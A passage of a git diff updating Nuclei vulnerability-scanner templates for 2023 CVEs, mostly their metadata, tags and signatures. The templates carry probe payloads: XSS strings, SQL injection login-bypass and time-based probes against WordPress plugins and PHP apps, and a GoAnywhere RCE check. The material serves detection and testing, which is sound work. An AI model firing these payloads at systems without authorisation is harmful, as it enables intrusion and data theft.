4b0a00483046022100e04d22e3c9f98a73a04f2df0ebc25a6f86b2441aab53abde2822f6c4307266d4022100f3582924ba72e0f4076d042a65eb28d5f6ab0a70b9094581c0591d602a8e30f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0334.yaml b/nuclei-templates/CVE-2023/CVE-2023-0334.yaml index 0dc727935c..f690848cd6 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0334.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0334.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0334 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.001 + epss-percentile: 0.40094 cpe: cpe:2.3:a:shortpixel:shortpixel_adaptive_images:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: product: shortpixel_adaptive_images framework: wordpress publicwww-query: /wp-content/plugins/shortpixel-adaptive-images/ - tags: cve,cve2023,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images + tags: cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel http: - method: GET @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "shortpixel") && contains(body, "</script><img src=1 onerror=alert(document.domain)>")' condition: and -# digest: 4a0a0047304502203d5a0d3071cfe901b4f7f839f67e36216f6b01cdcee5974be5c768667205b208022100f915868b4da62fc2aff87532e7a983181e2172657236807d82fd732663c1d2c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203508d5e191b0f01786fb58c69f6f58561b03fb802660cf3d9897bc32149c97b6022100c2759cc2f8e2cd0d0da129288ab33ee23dadc2e8c4ee0e78c6d5d4591758c2f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0448.yaml b/nuclei-templates/CVE-2023/CVE-2023-0448.yaml index 2d525ebd85..3f52acf9d1 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0448.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0448.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 4.3 and above reference: - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256 @@ -15,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0448 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29476 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: product: wp_helper_premium framework: wordpress publicwww-query: "/wp-content/plugins/wp-helper-lite" - tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite + tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao http: - method: GET @@ -40,4 +42,4 @@ http: - 'contains(body, "><svg onload=alert(document.domain)>")' - 'contains(body, "params\":{\"action")' condition: and -# digest: 4a0a0047304502202f74556c7f13048019f383031b64a07ddffe9d28b9d02f2b5e32c9e18aca7e3602210090d475e05409bddbb95ce5cc645a086a143ac5a019a2bd9adfbdf8cb437e3205:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d8aa32338bfb7f81e502ff42a03d08e31ef3ea396eb9a3ff9fa31026dd6ff740221009f8879ac6a1bdfdfd7cf3db48ff44c8bf0a5022ef91619d357685c2211a6d58a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0514.yaml b/nuclei-templates/CVE-2023/CVE-2023-0514.yaml index 07467a46bc..98d83b6ae2 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0514.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0514.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of the Membership Database software or apply the necessary security patches provided by the vendor. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2023-0514 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29531 + epss-percentile: 0.29003 cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: membership_database_project product: membership_database framework: wordpress - tags: wpscan,cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss + tags: cve2023,cve,wpscan,membership-database,wp,wp-plugin,wordpress,authenticated,xss,membership_database_project http: - raw: @@ -51,4 +53,4 @@ http: - 'contains(body_2, "<script>alert(document.domain)</script>")' - 'contains(body_2, "Member Database")' condition: and -# digest: 4a0a00473045022100d4592e96601856f8b413b9bd697d58083a0f9f4695b0a3055ebc3ba05bdda00c02207f898c24894fd658ae335d1cc4548073aafacc069e199691392d4c29bfd6d6e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f0422b248523ed3922d1453f05cf58d5f60c4ae304a8a6f2ecaff8009992d6b022056ea05f2741c237996bb80986bc2a280c311a1d9802f2ae9e9e5a71038db2be2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0527.yaml b/nuclei-templates/CVE-2023/CVE-2023-0527.yaml index 4e76746784..526013cd9d 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0527.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0527.yaml @@ -1,38 +1,49 @@ id: CVE-2023-0527 info: - name: Online Security Guards Hiring System - Reflected XSS + name: Online Security Guards Hiring System - Cross-Site Scripting author: Harsh severity: medium description: | - A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input "><script>alert(document.domain)</script> leads to cross site scripting. The attack may be launched remotely. + A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://vuldb.com/?ctiid.219596 - https://nvd.nist.gov/vuln/detail/CVE-2023-0527 - https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md + - http://packetstormsecurity.com/files/172667/Online-Security-Guards-Hiring-System-1.0-Cross-Site-Scripting.html + - https://vuldb.com/?id.219596 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0527 cwe-id: CWE-79 + epss-score: 0.00228 + epss-percentile: 0.6097 + cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2023,osghs,xss,unauthenticated,reflected + max-request: 1 + vendor: online_security_guards_hiring_system_project + product: online_security_guards_hiring_system + tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project + http: - raw: - | - POST /osghs/search-request.php HTTP/1.1 + POST /search-request.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - searchdata=%3Cimg+src%3D%22%23%22+onerror%3D%22location.href%3D%27http%3A%2F%2Fevil.com%27%3B%22%3E&search= + searchdata=<img%20src=x%20onerror=alert(document.domain)>&search= - cookie-reuse: true - redirects: true matchers: - type: dsl dsl: - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "<img src=x onerror=alert(document.domain)>")' - 'contains(body, "Online Security Gauard Hiring System |Search Request")' - - 'contains(body, "evil.com")' condition: and +# digest: 4a0a00473045022100a43c27d627e8467ae87028412d582a54888b15b6d467bebb762ba204dbf65113022041c5d7946de5f33a3cbcee2c5c5376022e68453311691ea38e97baf127489725:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0552.yaml b/nuclei-templates/CVE-2023/CVE-2023-0552.yaml index 71940f7e61..ac4799a04d 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0552.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0552.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-0552 cwe-id: CWE-601 - epss-score: 0.00077 - epss-percentile: 0.32318 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve2023,redirect,pie,pie-register,wpscan,cve + tags: cve2023,cve,redirect,pie,pie-register,wpscan,genetechsolutions,wordpress http: - method: GET @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a00473045022100ffe57847ba727759e09229434758c6972ee1d975349abe94f7285118fa09f24702205df2e0c2dc533171b536ecfdfda6692bf6bbae4bc65146a7c667a991daa7fce2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a43102975ca9cbbf8f2d57a5f3a53496de4ac374bde3bcf0ee22cd7990f8c820220148b4d4d1ca0ef65545d30ac6b9ae93ed2bbf928f8b3e981e19fc44b2a19c151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0562.yaml b/nuclei-templates/CVE-2023/CVE-2023-0562.yaml index a2c9ebf15f..64a16cf314 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0562.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0562.yaml @@ -6,17 +6,29 @@ info: severity: critical description: | A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://vuldb.com/?ctiid.219716 - https://nvd.nist.gov/vuln/detail/CVE-2023-0562 + - https://vuldb.com/?id.219716 + - https://github.com/ctflearner/ctflearner classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-0562 cwe-id: CWE-89 + epss-score: 0.02218 + epss-percentile: 0.89242 + cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2023,blms,sqli,bypass + max-request: 1 + vendor: phpgurukul + product: bank_locker_management_system + tags: cve,cve2023,blms,sqli,bypass,phpgurukul http: - raw: @@ -27,7 +39,6 @@ http: username=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login= - cookie-reuse: true redirects: true matchers: - type: dsl @@ -36,3 +47,4 @@ http: - 'contains(body, "admin")' - 'contains(body, "BLMS | Dashboard")' condition: and +# digest: 4a0a00473045022100a83e4f426dee5b966ea13ce961702c3c9f146fb91cc171084ddc7b338df6982802205438c91226989896a74aeeae0b041231e409cadbe2eda2301ea0bb1d7eeab9ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0563.yaml b/nuclei-templates/CVE-2023/CVE-2023-0563.yaml index 5ab54becdb..697aba6c71 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0563.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0563.yaml @@ -6,17 +6,29 @@ info: severity: medium description: | A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://vuldb.com/?ctiid.219717 - https://nvd.nist.gov/vuln/detail/CVE-2023-0563 + - https://vuldb.com/?id.219717 + - https://github.com/ctflearner/ctflearner classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2023-0563 cwe-id: CWE-79 + epss-score: 0.00249 + epss-percentile: 0.64164 + cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2023,blms,xss + max-request: 1 + vendor: phpgurukul + product: bank_locker_management_system + tags: cve2023,cve,blms,xss,phpgurukul http: - raw: @@ -27,7 +39,6 @@ http: searchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit= - cookie-reuse: true redirects: true matchers: - type: dsl @@ -36,3 +47,4 @@ http: - 'contains(body, "/><script>alert(document.domain)</script>")' - 'contains(body, "Bank Locker Management System")' condition: and +# digest: 4b0a00483046022100d454a122aad91e9dea4225555e6ced18d36bd03530358996ae175eea4f59a9cc022100e8591a78edb324b44d798e9732dd1eef101ead3d5e1f2de0e91e951457f2293a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0585.yaml b/nuclei-templates/CVE-2023/CVE-2023-0585.yaml index e2b9da71b1..48abd48457 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0585.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0585.yaml @@ -1,36 +1,58 @@ -id: wordpress-seo-version +id: CVE-2023-0585 info: - name: wordpress seo plugin < 4.3.0 cross-site scripting - author: Jordan Swebeck + name: > + All in One SEO Pack <= 4.2.9 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder severity: medium - description: Find out if the wp seo all in one plugin version is pre 4.3.0, if so it is vulerable to stored XXS - classification: + description: > + The All in One SEO Pack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 4.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Administrator role or above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3db97180-9308-4891-9de9-acefe31d088f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 cve-id: CVE-2023-0585 - cwe-id: CWE-79 - cvss-score: 7.3 - - tags: cve,cve2023,xss,wp,wp-plugin,wordpress + metadata: + fofa-query: "wp-content/plugins/all-in-one-seo-pack/" + google-query: inurl:"/wp-content/plugins/all-in-one-seo-pack/" + shodan-query: 'vuln:CVE-2023-0585' + tags: cve,wordpress,wp-plugin,all-in-one-seo-pack,medium - -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" - headers: - User-Agent: "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" - - matchers-condition: and - matchers: + extractors: - type: regex + name: version part: body + group: 1 + internal: true regex: - - "Improved PHP 8.1 compatibility" - negative: true + - "(?mi)Stable tag: ([0-9.]+)" + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: - type: status status: - 200 - - 304 + - type: word + words: + - "all-in-one-seo-pack" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0600.yaml b/nuclei-templates/CVE-2023/CVE-2023-0600.yaml index fff90cdc8a..5cf087ab03 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0600.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0600.yaml @@ -2,7 +2,7 @@ id: CVE-2023-0600 info: name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection - author: r3Y3r53 + author: r3Y3r53,j4vaovo severity: critical description: | The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks. @@ -10,26 +10,41 @@ info: reference: - https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4 - https://nvd.nist.gov/vuln/detail/CVE-2023-0600 + - https://github.com/truocphan/VulnBox classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-0600 cwe-id: CWE-89 - epss-score: 0.03606 - epss-percentile: 0.90651 + epss-score: 0.02396 + epss-percentile: 0.89644 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: plugins-market product: wp_visitor_statistics framework: wordpress - public-www: "/wp-content/plugins/wp-stats-manager/" - tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli + fofa-query: body="wp-stats-manager" + public-www: /wp-content/plugins/wp-stats-manager/ + tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market variables: str: '{{rand_int(100000, 999999)}}' +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Real Time Traffic' + - raw: - | @timeout: 30s @@ -43,4 +58,4 @@ http: - 'status_code == 200' - 'contains(body, "sleep(6)")' condition: and -# digest: 490a0046304402203079d9f015ead5287a351abc4e7e63a4dd32b7e72adb33240f97224e6e24d3f4022053669ab78fd09297e330146fde6cf9b9875d4a83eeafec0ec847cb9ce83851b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220261580cf7a6acf3bd48c82b17b9befe18160f0f95f445a299f518bc9a852492902200976177287be838bdccc1077745ec0a5fb67ea2cbf3048964a74b82748fadfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0602.yaml b/nuclei-templates/CVE-2023/CVE-2023-0602.yaml index 8d98edfec1..e53dffbe2e 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0602.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0602.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-0602 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26619 + epss-percentile: 0.26204 cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: vendor: johnniejodelljr product: twittee_text_tweet framework: wordpress - tags: cve,cve2023,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet + tags: cve2023,cve,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr http: - raw: @@ -43,6 +43,6 @@ http: dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - - 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "twittee")' + - 'contains_all(body_2, "<script>alert(document.domain)</script>", "twittee")' condition: and -# digest: 4a0a00473045022100babf73b767cb60572e97d1d4a1d5d4e392e110d314161963a7c675ff751dc63a022026950b6e73c97186ad09765b249960f90ddee55796af0116166cceba4e3a57b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e5fce08d81164199e113a5e8a44e47e3a80de938ed5284232742f6ec12745cff022100af62d819e8c9fe644c67d22c4e6cb543bfce8719a6d6046b423facdeed2ee8e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0630.yaml b/nuclei-templates/CVE-2023/CVE-2023-0630.yaml index ed1f213cdf..2dfa76c78a 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0630.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0630.yaml @@ -6,18 +6,22 @@ info: severity: high description: | The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database, potentially exposing sensitive information. remediation: Fixed in version 4.9.3.3 reference: - https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55 - https://wordpress.org/plugins/wp-slimstat - https://nvd.nist.gov/vuln/detail/CVE-2023-0630 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/RandomRobbieBF/CVE-2023-0630 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-0630 cwe-id: CWE-89 - epss-score: 0.0628 - epss-percentile: 0.92854 + epss-score: 0.05275 + epss-percentile: 0.92293 cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +29,7 @@ info: vendor: wp-slimstat product: slimstat_analytics framework: wordpress - tags: wpscan,cve,cve2023,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated + tags: cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated http: - raw: @@ -50,4 +54,4 @@ http: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "audioShortcodeLibrary")' condition: and -# digest: 4a0a00473045022100d1fef79817abc4e7ec34c73be7386a103e585734b71753bde8bf4613a247b31402201a6ba694f77940ec0a39e4d71f2d32d21847af59acd72d2c81bbf9f8852c9f42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d8cfa34716682707fd04b70f6767f9548456638742f3be97df93a370889381f022100f4b24efcacacbf6795ea4cc37fce07c2968f568e61300a6be831a398ff3fd492:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0669.yaml b/nuclei-templates/CVE-2023/CVE-2023-0669.yaml index d8a77537cb..5cfa80b391 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0669.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0669.yaml @@ -1,22 +1,38 @@ id: CVE-2023-0669 info: - name: GoAnywhere MFT - Remote Code Execution (ZeroDay) + name: Fortra GoAnywhere MFT - Remote Code Execution author: rootxharsh,iamnoooob,dhiyaneshdk,pdresearch - severity: critical + severity: high description: | - Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object. + Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1 - https://infosec.exchange/@briankrebs/109795710941843934 - https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-0669 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2023-0669 + cwe-id: CWE-502 + epss-score: 0.96954 + epss-percentile: 0.99709 + cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: fortra + product: goanywhere_managed_file_transfer shodan-query: http.favicon.hash:1484947000 - verified: "true" - tags: cve,cve2023,rce,goanywhere,oast,kev + tags: cve2023,cve,rce,goanywhere,oast,kev,fortra -requests: +http: - raw: - | POST /goanywhere/lic/accept HTTP/1.1 @@ -40,4 +56,5 @@ requests: - type: status status: - - 500 \ No newline at end of file + - 500 +# digest: 4a0a004730450220207c735e2469d6bf2af5178c7053b234490ccaa8584d568bb036adcc0ca0e16c022100dd5efb4ae7b7db86c7b6caee1806c494eeb8c6ce825ea4d94c449c4a09f4ff96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0777.yaml b/nuclei-templates/CVE-2023/CVE-2023-0777.yaml index 1d2fff10de..8bf35a1aaa 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0777.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0777.yaml @@ -11,13 +11,14 @@ info: - https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7/ - http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html - https://github.com/modoboa/modoboa/commit/47d17ac6643f870719691073956a26e4be0a4806 + - https://github.com/7h3h4ckv157/7h3h4ckv157 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-0777 cwe-id: CWE-305,NVD-CWE-Other - epss-score: 0.07225 - epss-percentile: 0.93333 + epss-score: 0.07913 + epss-percentile: 0.93646 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +27,7 @@ info: product: modoboa shodan-query: html:"Modoboa" fofa-query: body="Modoboa" - tags: huntr,packetstorm,modoboa,default-login + tags: cve2023,cve,huntr,packetstorm,modoboa,default-login http: - raw: @@ -66,4 +67,4 @@ http: group: 1 regex: - csrftoken=([A-Za-z0-9]+) -# digest: 490a00463044022079aa6043e758f14079d797c24ec885aabafcec14adb24f97ef0de712e5be40f8022039a74204f3dfc5fe8cd3d89ac0354ac5bed98746548a647db98fe9d975644e56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008110d9c9ede7516bdf06f10bfcc9c5d842dac83bf1bf95a8ac2f6395b48f72c1022100c305294bead6b092ee60ac6b327382276c3dfbadacec79c73824950d065ca87f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0900.yaml b/nuclei-templates/CVE-2023/CVE-2023-0900.yaml index 935887f610..70a8fa58fe 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0900.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0900.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-0900 cwe-id: CWE-89 - epss-score: 0.00688 - epss-percentile: 0.77836 + epss-score: 0.00947 + epss-percentile: 0.82798 cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: product: pricing_table_builder framework: wordpress publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" - tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite + tags: cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart http: - raw: @@ -64,4 +64,4 @@ http: regex: - '_wpnonce=([0-9a-z]+)">Log Out' internal: true -# digest: 4a0a00473045022070b78af2f90dea1c35f6fe9931233ba27bc11cbc0c71a0cc1dacf4848b45bc42022100a9d761cbdb0f3128f6becf43f7675b7df6950e7177360804f5617be708d61c2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205451db383786918c1f14b6751c0ffaeb263600bab8cc76dc938cf3e1847531b902203c9a566e2f17d7cd2501e5dad53491de15f0dcbe0b569a5be1a41ca489e8b894:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0942.yaml b/nuclei-templates/CVE-2023/CVE-2023-0942.yaml index 011f34b1f9..e882c0a3ab 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0942.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0942.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.5.5. reference: - https://wpscan.com/vulnerability/71aa9460-6dea-49cc-946c-d7d4bf723511 @@ -18,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0942 cwe-id: CWE-79 - epss-score: 0.00358 - epss-percentile: 0.69047 + epss-score: 0.0049 + epss-percentile: 0.7561 cpe: 